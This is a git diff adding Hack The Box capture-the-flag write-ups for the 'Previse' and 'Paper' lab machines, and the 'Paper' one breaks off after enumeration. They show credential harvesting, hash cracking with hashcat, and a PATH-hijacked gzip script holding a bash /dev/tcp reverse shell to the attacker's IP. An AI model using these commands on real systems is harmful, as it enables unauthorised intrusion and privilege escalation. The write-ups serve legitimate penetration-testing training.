+ www-data@previse:/var/www/html$ python3 -c 'import pty;pty.spawn("/bin/bash")'
+ www-data@previse:/var/www/html$ ^Z
+ [1] + 1698749 suspended nc -lvnp 9001
+
+ [ 10.10.14.68/23 ] [ /dev/pts/22 ] [~]
+ → stty raw -echo ; fg
+ [1] + 1698749 continued nc -lvnp 9001
+ export TERM=screen-256color
+ www-data@previse:/var/www/html$ export SHELL=bash
+ www-data@previse:/var/www/html$ stty rows 50 cols 200
+ www-data@previse:/var/www/html$ reset
+
+
+
+Now that we have a fully interactive TTY let's enumerate the host using linpeas.sh:
+
+
+ [term1]
+ [ 10.10.14.68/23 ] [ /dev/pts/6 ] [~/HTB/Previse]
+ → cp ../Cap/linpeas.sh .
+
+ [ 10.10.14.68/23 ] [ /dev/pts/6 ] [~/HTB/Previse]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+ 10.129.95.185 - - [02/May/2022 13:03:29] "GET /linpeas.sh HTTP/1.1" 200 -
+
+ [term2]
+ www-data@previse:/var/www/html$ wget http://10.10.14.68:9090/linpeas.sh -O /tmp/peas.sh
+ --2022-05-02 11:03:22-- http://10.10.14.68:9090/linpeas.sh
+ Connecting to 10.10.14.68:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 776167 (758K) [application/x-sh]
+ Saving to: '/tmp/peas.sh'
+
+ /tmp/peas.sh 100%[=============================================================================================================>] 757.98K 1.41MB/s in 0.5s
+
+ 2022-05-02 11:03:23 (1.41 MB/s) - '/tmp/peas.sh' saved [776167/776167]
+
+ www-data@previse:/var/www/html$ chmod +x /tmp/peas.sh
+ www-data@previse:/var/www/html$ /tmp/peas.sh
+
+
+
+` 
+
+Looking at linpeas.sh's output we see that there is a mysql database on the server:
+
+
+
+And when we look at the config.php file we see the mysql password:
+
+
+ www-data@previse:/var/www/html$ ls -lash
+ total 188K
+ 4.0K drwxr-xr-x 4 www-data www-data 4.0K Jul 26 2021 .
+ 4.0K drwxr-xr-x 3 root root 4.0K Jul 26 2021 ..
+ 8.0K -rw-r--r-- 1 www-data www-data 5.6K Jun 12 2021 accounts.php
+ 16K -rwxrwxr-x 1 www-data www-data 16K Jun 3 2021 android-chrome-192x192.png
+ 52K -rwxrwxr-x 1 www-data www-data 50K Jun 3 2021 android-chrome-512x512.png
+ 16K -rwxrwxr-x 1 www-data www-data 14K Jun 3 2021 apple-touch-icon.png
+ 4.0K -rw-r--r-- 1 www-data www-data 208 Jun 12 2021 config.php
+ 4.0K drwxr-xr-x 2 www-data www-data 4.0K Jul 26 2021 css
+ 4.0K -rw-r--r-- 1 www-data www-data 1.6K Jun 9 2021 download.php
+ 4.0K -rwxrwxr-x 1 www-data www-data 724 Jun 3 2021 favicon-16x16.png
+ 4.0K -rwxrwxr-x 1 www-data www-data 1.7K Jun 3 2021 favicon-32x32.png
+ 16K -rwxrwxr-x 1 www-data www-data 16K Jun 3 2021 favicon.ico
+ 4.0K -rw-r--r-- 1 www-data www-data 1.2K Jun 12 2021 file_logs.php
+ 8.0K -rw-r--r-- 1 www-data www-data 6.0K Jun 9 2021 files.php
+ 4.0K -rw-r--r-- 1 www-data www-data 217 Jun 3 2021 footer.php
+ 4.0K -rw-r--r-- 1 www-data www-data 1012 Jun 6 2021 header.php
+ 4.0K -rw-r--r-- 1 www-data www-data 551 Jun 6 2021 index.php
+ 4.0K drwxr-xr-x 2 www-data www-data 4.0K Jul 26 2021 js
+ 4.0K -rw-r--r-- 1 www-data www-data 2.9K Jun 12 2021 login.php
+ 4.0K -rw-r--r-- 1 www-data www-data 190 Jun 8 2021 logout.php
+ 4.0K -rw-r--r-- 1 www-data www-data 1.2K Jun 9 2021 logs.php
+ 4.0K -rw-r--r-- 1 www-data www-data 1.3K Jun 5 2021 nav.php
+ 4.0K -rwxrwxr-x 1 www-data www-data 263 Jun 3 2021 site.webmanifest
+ 4.0K -rw-r--r-- 1 www-data www-data 1.9K Jun 9 2021 status.php
+ www-data@previse:/var/www/html$ cat config.php
+ <****?php
+
+ function connectDB(){
+ $host = 'localhost';
+ $user = 'root';
+ $passwd = 'mySQL_p@ssw0rd!:)';
+ $db = 'previse';
+ $mycon = new mysqli($host, $user, $passwd, $db);
+ return $mycon;
+ }
+
+ ?****>
+
+And we have the mysql credentials! **root:mySQL_p@ssw0rd!:)**
+
+
+ www-data@previse:/var/www/html$ mysql -u root -p
+ Enter password:
+ Welcome to the MySQL monitor. Commands end with ; or \g.
+ Your MySQL connection id is 19
+ Server version: 5.7.35-0ubuntu0.18.04.1 (Ubuntu)
+
+ Copyright (c) 2000, 2021, Oracle and/or its affiliates.
+
+ Oracle is a registered trademark of Oracle Corporation and/or its
+ affiliates. Other names may be trademarks of their respective
+ owners.
+
+ Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
+
+ mysql> show databases;
+ +--------------------+
+ | Database |
+ +--------------------+
+ | information_schema |
+ | mysql |
+ | performance_schema |
+ | previse |
+ | sys |
+ +--------------------+
+ 5 rows in set (0.01 sec)
+
+
+
+Let's take a look at the previse database:
+
+
+ mysql> use previse;
+ Reading table information for completion of table and column names
+ You can turn off this feature to get a quicker startup with -A
+
+ Database changed
+ mysql> show tables;
+ +-------------------+
+ | Tables_in_previse |
+ +-------------------+
+ | accounts |
+ | files |
+ +-------------------+
+ 2 rows in set (0.00 sec)
+
+ mysql> describe accounts;
+ +------------+--------------+------+-----+-------------------+----------------+
+ | Field | Type | Null | Key | Default | Extra |
+ +------------+--------------+------+-----+-------------------+----------------+
+ | id | int(11) | NO | PRI | NULL | auto_increment |
+ | username | varchar(50) | NO | UNI | NULL | |
+ | password | varchar(255) | NO | | NULL | |
+ | created_at | datetime | YES | | CURRENT_TIMESTAMP | |
+ +------------+--------------+------+-----+-------------------+----------------+
+ 4 rows in set (0.00 sec)
+
+ mysql> select * from accounts;
+ +----+----------+------------------------------------+---------------------+
+ | id | username | password | created_at |
+ +----+----------+------------------------------------+---------------------+
+ | 1 | m4lwhere | $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. | 2021-05-27 18:18:36 |
+ | 2 | nihilist | $1$🧂llol$2LVHOe2s.o1uq/rzC1K1A0 | 2022-05-02 10:27:41 |
+ +----+----------+------------------------------------+---------------------+
+
+
+
+Now here we see that the password field has a weird character in the middle, so to make sure we transfer it correctly to our machine let's use base64:
+
+
+ [term1]
+ mysql> select TO_BASE64(password) from accounts where id=1;
+ +--------------------------------------------------+
+ | TO_BASE64(password) |
+ +--------------------------------------------------+
+ | JDEk8J+ngmxsb2wkRFFwbWR2bmI3RWV1TzZVYXFSSXRmLg== |
+ +--------------------------------------------------+
+ 1 row in set (0.00 sec)
+
+ [term2]
+ [ 10.10.14.68/23 ] [ /dev/pts/23 ] [~/HTB/Previse]
+ → vim pass.b64
+
+ [ 10.10.14.68/23 ] [ /dev/pts/23 ] [~/HTB/Previse]
+ → cat pass.b64
+ JDEk8J+ngmxsb2wkRFFwbWR2bmI3RWV1TzZVYXFSSXRmLg==
+
+ [ 10.10.14.68/23 ] [ /dev/pts/23 ] [~/HTB/Previse]
+ → cat pass.b64 | base64 -d > pass.hash
+
+
+Now let's use hashcat to crack the hash using the rockyou.txt wordlist:
+
+
+ [ 10.10.14.68/23 ] [ /dev/pts/23 ] [~/HTB/Previse]
+ → hashcat -m 500 -a 0 '$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.' /usr/share/seclists/rockyou.txt
+ hashcat (v6.2.5) starting
+
+ * Device #1: WARNING! Kernel exec timeout is not disabled.
+ This may cause "CL_OUT_OF_RESOURCES" or related errors.
+ To disable the timeout, see: https://hashcat.net/q/timeoutpatch
+ * Device #2: WARNING! Kernel exec timeout is not disabled.
+ This may cause "CL_OUT_OF_RESOURCES" or related errors.
+ To disable the timeout, see: https://hashcat.net/q/timeoutpatch
+ CUDA API (CUDA 11.6)
+ ====================
+ * Device #1: NVIDIA GeForce RTX 3070 Ti, 4258/7979 MB, 48MCU
+
+ OpenCL API (OpenCL 3.0 CUDA 11.6.127) - Platform #1 [NVIDIA Corporation]
+ ========================================================================
+ * Device #2: NVIDIA GeForce RTX 3070 Ti, skipped
+
+ Minimum password length supported by kernel: 0
+ Maximum password length supported by kernel: 256
+
+ Hashes: 1 digests; 1 unique digests, 1 unique salts
+ Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
+ Rules: 1
+
+ Optimizers applied:
+ * Zero-Byte
+ * Single-Hash
+ * Single-Salt
+
+ ATTENTION! Pure (unoptimized) backend kernels selected.
+ Pure kernels can crack longer passwords, but drastically reduce performance.
+ If you want to switch to optimized kernels, append -O to your commandline.
+ See the above message to find out about the exact limits.
+
+ Watchdog: Temperature abort trigger set to 90c
+
+ Host memory required for this attack: 1356 MB
+
+ Dictionary cache hit:
+ * Filename..: /usr/share/seclists/rockyou.txt
+ * Passwords.: 14344384
+ * Bytes.....: 139921497
+ * Keyspace..: 14344384
+
+ Cracking performance lower than expected?
+
+ * Append -O to the commandline.
+ This lowers the maximum supported password/salt length (usually down to 32).
+
+ * Append -w 3 to the commandline.
+ This can cause your screen to lag.
+
+ * Append -S to the commandline.
+ This has a drastic speed impact but can be better for specific attacks.
+ Typical scenarios are a small wordlist but a large ruleset.
+
+ * Update your backend API runtime / driver the right way:
+ https://hashcat.net/faq/wrongdriver
+
+ * Create more work items to make use of your parallelization power:
+ https://hashcat.net/faq/morework
+
+ **$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.:ilovecody112235!**
+
+ Session..........: hashcat
+ Status...........: Cracked
+ Hash.Mode........: 500 (md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5))
+ Hash.Target......: $1$🧂llol$DQpmdvnb7EeuO6UaqRItf.
+ Time.Started.....: Mon May 2 13:22:23 2022 (10 secs)
+ Time.Estimated...: Mon May 2 13:22:33 2022 (0 secs)
+ Kernel.Feature...: Pure Kernel
+ Guess.Base.......: File (/usr/share/seclists/rockyou.txt)
+ Guess.Queue......: 1/1 (100.00%)
+ Speed.#1.........: 780.8 kH/s (11.24ms) @ Accel:16 Loops:125 Thr:256 Vec:1
+ Recovered........: 1/1 (100.00%) Digests
+ Progress.........: 7471104/14344384 (52.08%)
+ Rejected.........: 0/7471104 (0.00%)
+ Restore.Point....: 7274496/14344384 (50.71%)
+ Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:875-1000
+ Candidate.Engine.: Device Generator
+ Candidates.#1....: ivanisaac -> iarmy
+ Hardware.Mon.#1..: Temp: 53c Fan: 64% Util: 75% Core:1950MHz Mem:9501MHz Bus:16
+
+ Started: Mon May 2 13:22:23 2022
+ Stopped: Mon May 2 13:22:34 2022
+
+
+
+And we cracked the hash! now let's try to ssh in as the user m4lwhere using that password:
+
+
+ [ 10.10.14.68/23 ] [ /dev/pts/23 ] [~/HTB/Previse]
+ → ssh m4lwhere@previse.htb
+ The authenticity of host 'previse.htb (10.129.95.185)' can't be established.
+ ED25519 key fingerprint is SHA256:BF5tg2bhcRrrCuaeVQXikjd8BCPxgLsnnwHlaBo3dPs.
+ This key is not known by any other names
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added 'previse.htb' (ED25519) to the list of known hosts.
+ m4lwhere@previse.htb's password:
+ Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-151-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ System information as of Mon May 2 11:24:33 UTC 2022
+
+ System load: 0.0 Processes: 177
+ Usage of /: 54.7% of 4.85GB Users logged in: 0
+ Memory usage: 47% IP address for eth0: 10.129.95.185
+ Swap usage: 0%
+
+
+ 0 updates can be applied immediately.
+
+
+ Last login: Fri Jun 18 01:09:10 2021 from 10.10.10.5
+ m4lwhere@previse:~$ id
+ uid=1000(m4lwhere) gid=1000(m4lwhere) groups=1000(m4lwhere)
+ m4lwhere@previse:~$ cat user.txt
+ 23XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to login as the user m4lwhere, and we got the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now in order to get to the root user let's enumerate the box with linpeas.sh, this time as the m4lwhere user:
+
+
+ m4lwhere@previse:~$ wget http://10.10.14.68:9090/linpeas.sh -O /tmp/peas.sh
+ --2022-05-02 11:27:21-- http://10.10.14.68:9090/linpeas.sh
+ Connecting to 10.10.14.68:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 776167 (758K) [application/x-sh]
+ Saving to: ‘/tmp/peas.sh’
+
+ /tmp/peas.sh 100%[===================================================================================>] 757.98K 1.99MB/s in 0.4s
+
+ 2022-05-02 11:27:22 (1.99 MB/s) - ‘/tmp/peas.sh’ saved [776167/776167]
+
+ m4lwhere@previse:~$ chmod +x /tmp/peas.sh
+ m4lwhere@previse:~$ /tmp/peas.sh
+
+
+
+Looking at the output we see the following:
+
+
+
+And when we run sudo -l we see that our current m4lwhere user can run this script as root:
+
+
+ m4lwhere@previse:~$ sudo -l
+ [sudo] password for m4lwhere:
+ User m4lwhere may run the following commands on previse:
+ (root) /opt/scripts/access_backup.sh
+
+
+
+So let's see what commands are being ran by that script:
+
+
+ m4lwhere@previse:~$ cat /opt/scripts/access_backup.sh
+ #!/bin/bash
+
+ # We always make sure to store logs, we take security SERIOUSLY here
+
+ # I know I shouldnt run this as root but I cant figure it out programmatically on my account
+ # This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time
+
+ gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
+ gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz
+
+
+
+So in this script the gzip command is not being run with the absolute path. So let's create a new gzip bash script:
+
+
+ m4lwhere@previse:~$ vim gzip
+
+ m4lwhere@previse:~$ cat gzip
+ #!/bin/sh
+ bash -c 'bash -i >& /dev/tcp/10.10.14.68/9002 0>&1'
+
+ m4lwhere@previse:~$ chmod +x gzip
+ m4lwhere@previse:~$ which gzip
+ /bin/gzip
+ m4lwhere@previse:~$ echo $PATH
+ /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
+
+
+
+Now we want our new gzip file to be ran instead of the default /bin/gzip binary, so let's add the current working directory into the PATH variable:
+
+
+ m4lwhere@previse:~$ export PATH=.:$PATH
+ m4lwhere@previse:~$ echo $PATH
+ .:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
+ m4lwhere@previse:~$ which gzip
+ ./gzip
+
+
+
+And now when we run the backup script as the root user we should get reverse shell as the root user on port 9002:
+
+
+ [term1]
+ m4lwhere@previse:~$ sudo /opt/scripts/access_backup.sh
+
+ [term2]
+ [ 10.10.14.68/23 ] [ /dev/pts/24 ] [~/HTB/Previse]
+ → nc -lvnp 9002
+ Connection from 10.129.95.185:59276
+ root@previse:~# id
+ id
+ uid=0(root) gid=0(root) groups=0(root)
+ root@previse:~# cat /root/root.txt
+ cat /root/root.txt
+ 26XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And there you go! We managed to get the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/65.md b/Easy/65.md
new file mode 100644
index 0000000..fd0f3f1
--- /dev/null
+++ b/Easy/65.md
@@ -0,0 +1,451 @@
+# Paper Writeup
+
+
+
+## Introduction :
+
+Paper is an easy box released back in Febuary 2022
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
+ → sudo vim /etc/hosts
+ [sudo] password for nothing:
+
+ [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
+ → ping paper.htb
+ PING paper.htb (10.129.136.31) 56(84) bytes of data.
+ 64 bytes from paper.htb (10.129.136.31): icmp_seq=1 ttl=63 time=24.9 ms
+ ^C
+ --- paper.htb ping statistics ---
+ 1 packets transmitted, 1 received, 0% packet loss, time 0ms
+ rtt min/avg/max/mdev = 24.883/24.883/24.883/0.000 ms
+
+ [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
+ → nmap -sCV paper.htb
+ Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-30 20:21 CEST
+ Nmap scan report for paper.htb (10.129.136.31)
+ Host is up (0.028s latency).
+ Not shown: 997 closed tcp ports (conn-refused)
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
+ | ssh-hostkey:
+ | 2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
+ | 256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
+ |_ 256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
+ 80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
+ |_http-title: HTTP Server Test Page powered by CentOS
+ | http-methods:
+ |_ Potentially risky methods: TRACE
+ |_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
+ |_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
+ 443/tcp open ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
+ |_http-title: HTTP Server Test Page powered by CentOS
+ |_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
+ | http-methods:
+ |_ Potentially risky methods: TRACE
+ | tls-alpn:
+ |_ http/1.1
+ |_ssl-date: TLS randomness does not represent time
+ | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
+ | Subject Alternative Name: DNS:localhost.localdomain
+ | Not valid before: 2021-07-03T08:52:34
+ |_Not valid after: 2022-07-08T10:32:34
+ |_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 15.78 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 running apache 2.4.37 which is most likely running CentOS. When we curl port 80 we see it displays another domain:
+
+
+ [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
+ → curl -v http://paper.htb
+ * Trying 10.129.136.31:80...
+ * Connected to paper.htb (10.129.136.31) port 80 (#0)
+ GET / HTTP/1.1
+ Host: paper.htb
+ User-Agent: curl/7.84.0
+ Accept: */*
+
+ Mark bundle as not supporting multiuse
+ HTTP/1.1 403 Forbidden
+ Date: Tue, 30 Aug 2022 18:31:07 GMT
+ Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
+ X-Backend-Server: office.paper
+ Last-Modified: Sun, 27 Jun 2021 23:47:13 GMT
+ ETag: "30c0b-5c5c7fdeec240"
+ Accept-Ranges: bytes
+ Content-Length: 199691
+ Content-Type: text/html; charset=UTF-8
+
+
+
+So we add the domain office.paper to our /etc/hosts file:
+
+
+ [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
+ → sudo vim /etc/hosts
+ [sudo] password for nothing:
+
+ [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
+ → cat /etc/hosts | grep paper
+ 10.129.136.31 paper.htb office.paper
+
+ [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
+ → ping office.paper
+ PING paper.htb (10.129.136.31) 56(84) bytes of data.
+ 64 bytes from paper.htb (10.129.136.31): icmp_seq=1 ttl=63 time=23.2 ms
+ 64 bytes from paper.htb (10.129.136.31): icmp_seq=2 ttl=63 time=23.0 ms
+
+
+
+let's enumerate for other subdomains using wfuzz (we specify the wordlist we want to use and we hide 403 code responses):
+
+
+ [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
+ → wfuzz -u http://office.paper -H "Host: FUZZ.office.paper" -w /bedrock/strata/kali/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hc 403
+ ********************************************************
+ * Wfuzz 3.1.0 - The Web Fuzzer *
+ ********************************************************
+
+ Target: http://office.paper/
+ Total requests: 4989
+
+ =====================================================================
+ ID Response Lines Word Chars Payload
+ =====================================================================
+
+ 000000070: 200 507 L 13015 W 223163 Ch "chat"
+ ^C /usr/lib/python3.10/site-packages/wfuzz/wfuzz.py:79: UserWarning:Finishing pending requests...
+
+ Total time: 5.887163
+ Processed Requests: 192
+ Filtered Requests: 191
+ Requests/sec.: 32.61332
+
+
+
+wfuzz found the chat.office.paper subdomain so let's also add it to our /etc/hosts file, then we browse it:
+
+
+
+And here we find a rocketchat instance. Let's go back to it after we get credentials. We move on back to the http site with the TLD office.paper:
+
+ 
+
+browsing to **http://office.paper/wp-admin** reveals that it is a wordpress site. So we run wpscan:
+
+
+ [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
+ → wpscan --url http://office.paper
+ _______________________________________________________________
+ __ _______ _____
+ \ \ / / __ \ / ____|
+ \ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
+ \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
+ \ /\ / | | ____) | (__| (_| | | | |
+ \/ \/ |_| |_____/ \___|\__,_|_| |_|
+
+ WordPress Security Scanner by the WPScan Team
+ Version 3.8.22
+
+ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
+ _______________________________________________________________
+
+ [i] Updating the Database ...
+ [i] Update completed.
+
+ [+] URL: http://office.paper/ [10.129.136.31]
+ [+] Started: Tue Aug 30 20:47:20 2022
+
+ Interesting Finding(s):
+
+ [+] Headers
+ | Interesting Entries:
+ | - Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
+ | - X-Powered-By: PHP/7.2.24
+ | - X-Backend-Server: office.paper
+ | Found By: Headers (Passive Detection)
+ | Confidence: 100%
+
+ [+] WordPress readme found: http://office.paper/readme.html
+ | Found By: Direct Access (Aggressive Detection)
+ | Confidence: 100%
+
+ **[+] WordPress version 5.2.3 identified (Insecure, released on 2019-09-05).
+ | Found By: Rss Generator (Passive Detection)
+ | - http://office.paper/index.php/feed/, generator>https://wordpress.org/?v=5.2.3/generator>
+ | - http://office.paper/index.php/comments/feed/, generator>https://wordpress.org/?v=5.2.3/generator>**
+
+ [+] WordPress theme in use: construction-techup
+ | Location: http://office.paper/wp-content/themes/construction-techup/
+ | Last Updated: 2021-07-17T00:00:00.000Z
+ | Readme: http://office.paper/wp-content/themes/construction-techup/readme.txt
+ | [!] The version is out of date, the latest version is 1.4
+ | Style URL: http://office.paper/wp-content/themes/construction-techup/style.css?ver=1.1
+ | Style Name: Construction Techup
+ | Description: Construction Techup is child theme of Techup a Free WordPress Theme useful for Business, corporate a...
+ | Author: wptexture
+ | Author URI: https://testerwp.com/
+ |
+ | Found By: Css Style In Homepage (Passive Detection)
+ |
+ | Version: 1.1 (80% confidence)
+ | Found By: Style (Passive Detection)
+ | - http://office.paper/wp-content/themes/construction-techup/style.css?ver=1.1, Match: 'Version: 1.1'
+
+ [+] Enumerating All Plugins (via Passive Methods)
+
+ [i] No plugins Found.
+
+ [+] Enumerating Config Backups (via Passive and Aggressive Methods)
+ Checking Config Backups - Time: 00:00:00 <****=================================================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:00
+
+ [i] No Config Backups Found.
+
+ [!] No WPScan API Token given, as a result vulnerability data has not been output.
+ [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
+
+ [+] Finished: Tue Aug 30 20:47:25 2022
+ [+] Requests Done: 185
+ [+] Cached Requests: 5
+ [+] Data Sent: 44.421 KB
+ [+] Data Received: 18.75 MB
+ [+] Memory used: 227.438 MB
+ [+] Elapsed time: 00:00:04
+
+So here this wordpress instance is vulnerable to CVE-2019-17671, which is basically a mistake which allows us to view published posts with the following PHP variable: **?static=1** which allows us to see all the other posts:
+
+
+
+here a secret post reveals to us the secret registering link, so let's use it to create an account:
+
+
+
+once we log in, we can see the following info:
+
+
+
+Basically there's a bot called recyclops and we can reach it via DM to type commands:
+
+
+
+We can list files with the command "list"
+
+
+
+And with directory traversal we see that there is a user on the box called "dwight".
+
+
+
+Going just one directory up we see the directory hubot containing a .env file with plaintext credentials: **recyclops/Queenofblad3s!23** , so let's check for password reuse with the user dwight:
+
+
+ [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
+ → crackmapexec ssh office.paper -u dwight -p 'Queenofblad3s!23'
+ [*] First time use detected
+ [*] Creating home directory structure
+ [*] Creating default workspace
+ [*] Initializing SMB protocol database
+ [*] Initializing LDAP protocol database
+ [*] Initializing SSH protocol database
+ [*] Initializing MSSQL protocol database
+ [*] Initializing WINRM protocol database
+ [*] Copying default configuration file
+ [*] Generating SSL certificate
+ /usr/lib/python3/dist-packages/pywerview/requester.py:144: SyntaxWarning: "is not" with a literal. Did you mean "!="?
+ if result['type'] is not 'searchResEntry':
+ SSH paper.htb 22 office.paper [*] SSH-2.0-OpenSSH_8.0
+ SSH paper.htb 22 office.paper [+] dwight:Queenofblad3s!23
+
+ [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
+ → ssh dwight@office.paper
+ The authenticity of host 'office.paper (10.129.136.31)' can't be established.
+ ED25519 key fingerprint is SHA256:9utZz963ewD/13oc9IYzRXf6sUEX4xOe/iUaMPTFInQ.
+ This key is not known by any other names
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added 'office.paper' (ED25519) to the list of known hosts.
+ dwight@office.paper's password:
+ Activate the web console with: systemctl enable --now cockpit.socket
+
+ Last login: Tue Feb 1 09:14:33 2022 from 10.10.14.23
+ [dwight@paper ~]$ id
+ uid=1004(dwight) gid=1004(dwight) groups=1004(dwight)
+ [dwight@paper ~]$ cat user.txt
+ a0XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And we managed to log in and get the user flag!
+
+## **Part 3 : Getting Root Access**
+
+Now in order to privesc let's enumerate the possible privesc paths using linpeas.sh:
+
+
+ [term1]
+ [dwight@paper ~]$ which wget curl
+ /usr/bin/wget
+ /usr/bin/curl
+
+ [term2]
+ [ 10.10.14.13/23 ] [ nowhere ] [~/HTB/Paper]
+ → wget https://github.com/carlospolop/PEASS-ng/releases/download/20220828/linpeas.sh
+ --2022-08-30 21:12:52-- https://github.com/carlospolop/PEASS-ng/releases/download/20220828/linpeas.sh
+ Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
+ Resolving github.com (github.com)... 140.82.121.3
+ Connecting to github.com (github.com)|140.82.121.3|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/14f0a504-adb0-4d42-918e-9a222fa1ba90?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential;=AKIAIWNJYAX4CSVEH53A%2F20220830%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date;=20220830T191251Z&X-Amz-Expires;=300&X-Amz-Signature;=9743821c11a0ac568713ac91163de2aee6d92a3462a4cfe931bf777ecbafbc1e&X-Amz-SignedHeaders;=host&actor;_id=0&key;_id=0&repo;_id=165548191&response-content-disposition;=attachment%3B%20filename%3Dlinpeas.sh&response-content-type;=application%2Foctet-stream [following]
+ --2022-08-30 21:12:53-- https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/14f0a504-adb0-4d42-918e-9a222fa1ba90?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential;=AKIAIWNJYAX4CSVEH53A%2F20220830%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date;=20220830T191251Z&X-Amz-Expires;=300&X-Amz-Signature;=9743821c11a0ac568713ac91163de2aee6d92a3462a4cfe931bf777ecbafbc1e&X-Amz-SignedHeaders;=host&actor;_id=0&key;_id=0&repo;_id=165548191&response-content-disposition;=attachment%3B%20filename%3Dlinpeas.sh&response-content-type;=application%2Foctet-stream
+ Resolving objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.111.133, 185.199.108.133, 185.199.110.133, ...
+ Connecting to objects.githubusercontent.com (objects.githubusercontent.com)|185.199.111.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 807205 (788K) [application/octet-stream]
+ Saving to: ‘linpeas.sh’
+
+ linpeas.sh 100%[=======================================================================================================================================================>] 788.29K 4.40MB/s in 0.2s
+
+ 2022-08-30 21:12:53 (4.40 MB/s) - ‘linpeas.sh’ saved [807205/807205]
+
+
+ [ 10.10.14.13/23 ] [ nowhere ] [~/HTB/Paper]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+ [term1]
+ [dwight@paper ~]$ wget 10.10.14.13:9090/linpeas.sh
+ --2022-08-30 15:13:45-- http://10.10.14.13:9090/linpeas.sh
+ Connecting to 10.10.14.13:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 807205 (788K) [application/x-sh]
+ Saving to: ‘linpeas.sh’
+
+ linpeas.sh 100%[=======================================================================================================================================================>] 788.29K 2.00MB/s in 0.4s
+
+ 2022-08-30 15:13:46 (2.00 MB/s) - ‘linpeas.sh’ saved [807205/807205]
+
+ [dwight@paper ~]$ chmod +x linpeas.sh
+ [dwight@paper ~]$ ./linpeas.sh
+
+
+
+`  
+
